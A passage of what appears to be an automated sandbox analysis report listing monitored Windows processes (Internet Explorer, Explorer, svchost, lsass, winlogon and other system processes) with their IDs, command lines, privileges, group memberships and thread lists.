0x118 Thread: id = 56 os_tid = 0xf0 Thread: id = 172 os_tid = 0xb58 Thread: id = 217 os_tid = 0x2c4 Thread: id = 222 os_tid = 0xbe4 Thread: id = 226 os_tid = 0x808 Process: id = "12" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0xa6b6000" os_pid = "0xaf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xb30" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" SCODEF:2864 CREDAT:14337" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0xb50 Thread: id = 71 os_tid = 0xb70 Thread: id = 72 os_tid = 0xb74 Thread: id = 73 os_tid = 0x24c Thread: id = 74 os_tid = 0xb88 Thread: id = 75 os_tid = 0xbcc Thread: id = 76 os_tid = 0x69c Thread: id = 77 os_tid = 0x484 Thread: id = 78 os_tid = 0x74c Thread: id = 79 os_tid = 0x688 Thread: id = 80 os_tid = 0xb4c Thread: id = 81 os_tid = 0x5b0 Thread: id = 82 os_tid = 0x330 Thread: id = 115 os_tid = 0xaa4 Thread: id = 116 os_tid = 0xb2c Thread: id = 117 os_tid = 0x758 Thread: id = 118 os_tid = 0x4e0 Thread: id = 119 os_tid = 0x710 Thread: id = 122 os_tid = 0xd0 Thread: id = 163 os_tid = 0xd8 Thread: id = 164 os_tid = 0xdc Process: id = "13" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x71ab000" os_pid = "0x454" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 84 os_tid = 0xbd0 Thread: id = 85 os_tid = 0xae4 Thread: id = 86 os_tid = 0x308 Thread: id = 87 os_tid = 0x56c Thread: id = 88 os_tid = 0x574 Thread: id = 89 os_tid = 0x550 Thread: id = 90 os_tid = 0x538 Thread: id = 91 os_tid = 0x514 Thread: id = 92 os_tid = 0x50c Thread: id = 93 os_tid = 0x4f0 Thread: id = 94 os_tid = 0x464 Thread: id = 95 os_tid = 0x264 Thread: id = 96 os_tid = 0x654 Thread: id = 97 os_tid = 0x64c Thread: id = 98 os_tid = 0x5b8 Thread: id = 99 os_tid = 0x578 Thread: id = 100 os_tid = 0x530 Thread: id = 101 os_tid = 0x52c Thread: id = 102 os_tid = 0x528 Thread: id = 103 os_tid = 0x520 Thread: id = 104 os_tid = 0x518 Thread: id = 105 os_tid = 0x510 Thread: id = 106 os_tid = 0x508 Thread: id = 107 os_tid = 0x4f0 Thread: id = 108 os_tid = 0x4b0 Thread: id = 109 os_tid = 0x4ac Thread: id = 110 os_tid = 0x4a4 Thread: id = 111 os_tid = 0x4a0 Thread: id = 112 os_tid = 0x49c Thread: id = 113 os_tid = 0x460 Thread: id = 114 os_tid = 0x458 Thread: id = 121 os_tid = 0x72c Thread: id = 165 os_tid = 0x884 Thread: id = 166 os_tid = 0x864 Thread: id = 167 os_tid = 0x240 Thread: id = 168 os_tid = 0x7e0 Thread: id = 169 os_tid = 0xbc0 Thread: id = 170 os_tid = 0x75c Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 124 os_tid = 0x748 Thread: id = 125 os_tid = 0x6b8 Thread: id = 126 os_tid = 0x5e4 Thread: id = 127 os_tid = 0xa98 Thread: id = 128 os_tid = 0x614 Thread: id = 129 os_tid = 0x54c Thread: id = 130 os_tid = 0xbd4 Thread: id = 131 os_tid = 0x9c4 Thread: id = 132 os_tid = 0x5b4 Thread: id = 133 os_tid = 0x114 Thread: id = 134 os_tid = 0x760 Thread: id = 135 os_tid = 0xab0 Thread: id = 136 os_tid = 0xa30 Thread: id = 137 os_tid = 0xa14 Thread: id = 138 os_tid = 0x994 Thread: id = 139 os_tid = 0x42c Thread: id = 140 os_tid = 0x1e4 Thread: id = 141 os_tid = 0x6d0 Thread: id = 142 os_tid = 0x6bc Thread: id = 143 os_tid = 0x6b0 Thread: id = 144 os_tid = 0x6a8 Thread: id = 145 os_tid = 0x698 Thread: id = 146 os_tid = 0x684 Thread: id = 147 os_tid = 0x678 Thread: id = 148 os_tid = 0x4a8 Thread: id = 149 os_tid = 0x46c Thread: id = 150 os_tid = 0x44c Thread: id = 151 os_tid = 0x424 Thread: id = 152 os_tid = 0x41c Thread: id = 153 os_tid = 0x404 Thread: id = 154 os_tid = 0x14c Thread: id = 155 os_tid = 0x3fc Thread: id = 156 os_tid = 0x3f4 Thread: id = 157 os_tid = 0x3e8 Thread: id = 158 os_tid = 0x39c Thread: id = 159 os_tid = 0x390 Thread: id = 160 os_tid = 0x388 Thread: id = 161 os_tid = 0x37c Thread: id = 162 os_tid = 0x374 Thread: id = 171 os_tid = 0x4e0 Thread: id = 190 os_tid = 0xb70 Thread: id = 212 os_tid = 0x484 Thread: id = 213 os_tid = 0xd8 Thread: id = 214 os_tid = 0xd4 Thread: id = 215 os_tid = 0x914 Thread: id = 227 os_tid = 0x818 Thread: id = 228 os_tid = 0x950 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 173 os_tid = 0xb40 Thread: id = 174 os_tid = 0x690 Thread: id = 175 os_tid = 0xb7c Thread: id = 176 os_tid = 0xae8 Thread: id = 177 os_tid = 0x90 Thread: id = 178 os_tid = 0x548 Thread: id = 179 os_tid = 0x750 Thread: id = 180 os_tid = 0x6a0 Thread: id = 181 os_tid = 0x680 Thread: id = 182 os_tid = 0x66c Thread: id = 183 os_tid = 0x5fc Thread: id = 184 os_tid = 0x188 Thread: id = 185 os_tid = 0x140 Thread: id = 186 os_tid = 0x128 Thread: id = 187 os_tid = 0x2b0 Thread: id = 188 os_tid = 0x218 Thread: id = 189 os_tid = 0x1cc Thread: id = 218 os_tid = 0x984 Thread: id = 221 os_tid = 0xbd8 Thread: id = 223 os_tid = 0x9f0 Thread: id = 224 os_tid = 0x980 Thread: id = 225 os_tid = 0x970 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 191 os_tid = 0x854 Thread: id = 192 os_tid = 0x79c Thread: id = 193 os_tid = 0x638 Thread: id = 194 os_tid = 0x554 Thread: id = 195 os_tid = 0x720 Thread: id = 196 os_tid = 0x668 Thread: id = 197 os_tid = 0x65c Thread: id = 198 os_tid = 0x144 Thread: id = 199 os_tid = 0x110 Thread: id = 200 os_tid = 0x3f0 Thread: id = 201 os_tid = 0x3ec Thread: id = 202 os_tid = 0x3e4 Thread: id = 203 os_tid = 0x3e0 Thread: id = 204 os_tid = 0x3d0 Thread: id = 205 os_tid = 0x3cc Thread: id = 206 os_tid = 0x398 Thread: id = 207 os_tid = 0x394 Thread: id = 208 os_tid = 0x384 Thread: id = 209 os_tid = 0x380 Thread: id = 210 os_tid = 0x350 Thread: id = 211 os_tid = 0x33c Thread: id = 216 os_tid = 0x180 Process: id = "17" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 229 os_tid = 0x8 Thread: id = 230 os_tid = 0x90 Thread: id = 231 os_tid = 0x9c Thread: id = 232 os_tid = 0x78 Thread: id = 233 os_tid = 0xc0 Thread: id = 234 os_tid = 0x28 Thread: id = 235 os_tid = 0xcc Thread: id = 236 os_tid = 0xc4 Thread: id = 237 os_tid = 0x44 Thread: id = 238 os_tid = 0x40 Thread: id = 239 os_tid = 0x3c Thread: id = 240 os_tid = 0x4c Thread: id = 241 os_tid = 0xb4 Thread: id = 242 os_tid = 0x5c Thread: id = 243 os_tid = 0xd0 Thread: id = 244 os_tid = 0xd4 Thread: id = 245 os_tid = 0xb8 Thread: id = 246 os_tid = 0xd8 Thread: id = 247 os_tid = 0xdc Thread: id = 248 os_tid = 0xe0 Thread: id = 251 os_tid = 0x64 Thread: id = 252 os_tid = 0x38 Thread: id = 253 os_tid = 0x34 Thread: id = 254 os_tid = 0xec Thread: id = 255 os_tid = 0xf8 Thread: id = 257 os_tid = 0x48 Thread: id = 258 os_tid = 0x104 Thread: id = 259 os_tid = 0x108 Thread: id = 260 os_tid = 0x110 Thread: id = 261 os_tid = 0x80 Thread: id = 262 os_tid = 0x8c Thread: id = 263 os_tid = 0x98 Thread: id = 264 os_tid = 0x114 Thread: id = 265 os_tid = 0x118 Thread: id = 266 os_tid = 0x10c Thread: id = 267 os_tid = 0x11c Thread: id = 271 os_tid = 0x134 Thread: id = 272 os_tid = 0x138 Thread: id = 273 os_tid = 0xb0 Thread: id = 274 os_tid = 0x13c Thread: id = 275 os_tid = 0x140 Thread: id = 276 os_tid = 0x50 Thread: id = 291 os_tid = 0x60 Thread: id = 295 os_tid = 0x194 Thread: id = 302 os_tid = 0x84 Thread: id = 305 os_tid = 0x68 Thread: id = 306 os_tid = 0x24 Thread: id = 324 os_tid = 0x88 Thread: id = 343 os_tid = 0x74 Thread: id = 348 os_tid = 0x268 Thread: id = 375 os_tid = 0x2dc Thread: id = 386 os_tid = 0x304 Thread: id = 389 os_tid = 0xbc Thread: id = 429 os_tid = 0x3c0 Thread: id = 468 os_tid = 0x26c Thread: id = 469 os_tid = 0x2dc Thread: id = 511 os_tid = 0x94 Thread: id = 519 os_tid = 0x20 Thread: id = 538 os_tid = 0x4f0 Thread: id = 556 os_tid = 0x4f8 Thread: id = 558 os_tid = 0x4f4 Thread: id = 561 os_tid = 0x560 Thread: id = 569 os_tid = 0xa0 Thread: id = 589 os_tid = 0x1c Thread: id = 598 os_tid = 0x5f4 Thread: id = 610 os_tid = 0x624 Thread: id = 624 os_tid = 0x65c Thread: id = 647 os_tid = 0x6c0 Thread: id = 649 os_tid = 0x6c8 Thread: id = 650 os_tid = 0x660 Process: id = "18" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2cacb000" os_pid = "0xe4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 249 os_tid = 0xe8 Thread: id = 250 os_tid = 0xf0 Thread: id = 268 os_tid = 0x120 Thread: id = 281 os_tid = 0x164 Process: id = "19" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2cc23000" os_pid = "0xfc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xe4" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 256 os_tid = 0x100 Process: id = "20" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2c976000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xe4" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 269 os_tid = 0x128 Process: id = "21" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c311000" os_pid = "0x12c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x124" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 270 os_tid = 0x130 Thread: id = 277 os_tid = 0x144 Thread: id = 278 os_tid = 0x148 Thread: id = 279 os_tid = 0x14c Thread: id = 280 os_tid = 0x150 Thread: id = 289 os_tid = 0x188 Thread: id = 296 os_tid = 0x19c Thread: id = 297 os_tid = 0x1a0 Thread: id = 301 os_tid = 0x1b8 Thread: id = 313 os_tid = 0x1e0 Process: id = "22" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2607c000" os_pid = "0x154" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xe4" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 282 os_tid = 0x158 Process: id = "23" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x2c117000" os_pid = "0x15c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x124" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 283 os_tid = 0x160 Thread: id = 292 os_tid = 0x18c Thread: id = 293 os_tid = 0x190 Thread: id = 298 os_tid = 0x1a4 Thread: id = 299 os_tid = 0x1a8 Thread: id = 300 os_tid = 0x1b4 Thread: id = 316 os_tid = 0x1f0 Thread: id = 361 os_tid = 0x2a8 Process: id = "24" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x258d6000" os_pid = "0x168" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x154" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 284 os_tid = 0x16c Thread: id = 285 os_tid = 0x170 Thread: id = 286 os_tid = 0x174 Thread: id = 287 os_tid = 0x178 Thread: id = 288 os_tid = 0x17c Thread: id = 294 os_tid = 0x198 Thread: id = 310 os_tid = 0x1d4 Thread: id = 311 os_tid = 0x1d8 Process: id = "25" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x23cdc000" os_pid = "0x180" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x154" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 290 os_tid = 0x184 Thread: id = 303 os_tid = 0x1cc Thread: id = 304 os_tid = 0x1d0 Thread: id = 366 os_tid = 0x2bc Thread: id = 380 os_tid = 0x2f4 Thread: id = 444 os_tid = 0xfc Thread: id = 447 os_tid = 0x108 Thread: id = 450 os_tid = 0x110 Process: id = "26" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1a290000" os_pid = "0x1ac" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 307 os_tid = 0x1b0 Thread: id = 325 os_tid = 0x20c Thread: id = 326 os_tid = 0x210 Thread: id = 327 os_tid = 0x214 Thread: id = 328 os_tid = 0x218 Thread: id = 330 os_tid = 0x220 Thread: id = 331 os_tid = 0x224 Thread: id = 332 os_tid = 0x228 Thread: id = 333 os_tid = 0x22c Thread: id = 347 os_tid = 0x264 Thread: id = 448 os_tid = 0x104 Thread: id = 477 os_tid = 0x110 Thread: id = 480 os_tid = 0x354 Thread: id = 482 os_tid = 0x404 Thread: id = 542 os_tid = 0x50c Thread: id = 555 os_tid = 0x54c Thread: id = 559 os_tid = 0x550 Process: id = "27" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x1919b000" os_pid = "0x1bc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 308 os_tid = 0x1c0 Thread: id = 312 os_tid = 0x1dc Thread: id = 314 os_tid = 0x1e4 Thread: id = 315 os_tid = 0x1e8 Thread: id = 317 os_tid = 0x1ec Thread: id = 318 os_tid = 0x1f4 Thread: id = 319 os_tid = 0x1f8 Thread: id = 320 os_tid = 0x1fc Thread: id = 321 os_tid = 0x200 Thread: id = 322 os_tid = 0x204 Thread: id = 323 os_tid = 0x208 Thread: id = 387 os_tid = 0x310 Thread: id = 390 os_tid = 0x31c Thread: id = 449 os_tid = 0x118 Thread: id = 481 os_tid = 0x408 Process: id = "28" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x197a2000" os_pid = "0x1c4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 309 os_tid = 0x1c8 Thread: id = 329 os_tid = 0x21c Thread: id = 363 os_tid = 0x2ac Thread: id = 365 os_tid = 0x2b4 Thread: id = 370 os_tid = 0x2c8 Thread: id = 371 os_tid = 0x2cc Thread: id = 372 os_tid = 0x2d0 Thread: id = 373 os_tid = 0x2d4 Thread: id = 374 os_tid = 0x2d8 Thread: id = 377 os_tid = 0x2e4 Process: id = "29" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x18825000" os_pid = "0x230" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000718c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 334 os_tid = 0x234 Thread: id = 335 os_tid = 0x238 Thread: id = 336 os_tid = 0x23c Thread: id = 337 os_tid = 0x240 Thread: id = 338 os_tid = 0x244 Thread: id = 339 os_tid = 0x248 Thread: id = 340 os_tid = 0x24c Thread: id = 341 os_tid = 0x250 Thread: id = 342 os_tid = 0x254 Thread: id = 344 os_tid = 0x258 Thread: id = 345 os_tid = 0x25c Thread: id = 346 os_tid = 0x260 Thread: id = 349 os_tid = 0x26c Thread: id = 351 os_tid = 0x278 Thread: id = 352 os_tid = 0x27c Thread: id = 354 os_tid = 0x284 Thread: id = 394 os_tid = 0x318 Thread: id = 658 os_tid = 0x6e8 Process: id = "30" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x18943000" os_pid = "0x270" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b79c" [0xc000000f], "LOCAL" [0x7] Thread: id = 350 os_tid = 0x274 Thread: id = 353 os_tid = 0x280 Thread: id = 355 os_tid = 0x288 Thread: id = 356 os_tid = 0x28c Thread: id = 357 os_tid = 0x290 Thread: id = 358 os_tid = 0x294 Thread: id = 359 os_tid = 0x298 Thread: id = 360 os_tid = 0x29c Thread: id = 626 os_tid = 0x668 Thread: id = 635 os_tid = 0x690 Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x17d70000" os_pid = "0x2a0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba83" [0xc000000f], "LOCAL" [0x7] Thread: id = 362 os_tid = 0x2a4 Thread: id = 364 os_tid = 0x2b0 Thread: id = 367 os_tid = 0x2b8 Thread: id = 368 os_tid = 0x2c0 Thread: id = 369 os_tid = 0x2c4 Thread: id = 376 os_tid = 0x2e0 Thread: id = 379 os_tid = 0x2f0 Thread: id = 396 os_tid = 0x334 Thread: id = 398 os_tid = 0x33c Thread: id = 399 os_tid = 0x340 Thread: id = 400 os_tid = 0x344 Thread: id = 401 os_tid = 0x348 Thread: id = 416 os_tid = 0x388 Thread: id = 417 os_tid = 0x38c Thread: id = 418 os_tid = 0x390 Thread: id = 421 os_tid = 0x3a0 Thread: id = 423 os_tid = 0x3a8 Thread: id = 484 os_tid = 0x410 Thread: id = 489 os_tid = 0x42c Thread: id = 492 os_tid = 0x438 Thread: id = 495 os_tid = 0x44c Thread: id = 500 os_tid = 